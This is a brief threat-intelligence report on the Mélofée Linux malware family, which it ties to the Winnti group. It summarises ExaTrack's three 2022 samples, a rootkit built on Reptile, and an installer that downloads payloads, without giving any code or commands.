A new malware family called Mélofée has been discovered targeting Linux servers related to a limited number of high-value targets. The implant has been linked to a cluster of Chinese state-sponsored groups, specifically the Winnti group, on the basis of its capabilities and other TTPs.
Mélofée has three variants
ExaTrack detected three different samples of Mélofée, likely dated between January and May 2022.
- All three samples share a common code base, while their communication protocols and encryption methods are in active development.
- One of the samples dropped a rootkit, designed to target a specific kernel version. Its code is based on the open-source rootkit project Reptile.
- All samples comprise an installer that uses shell commands to download the rootkit and the main implant from an attacker-controlled server.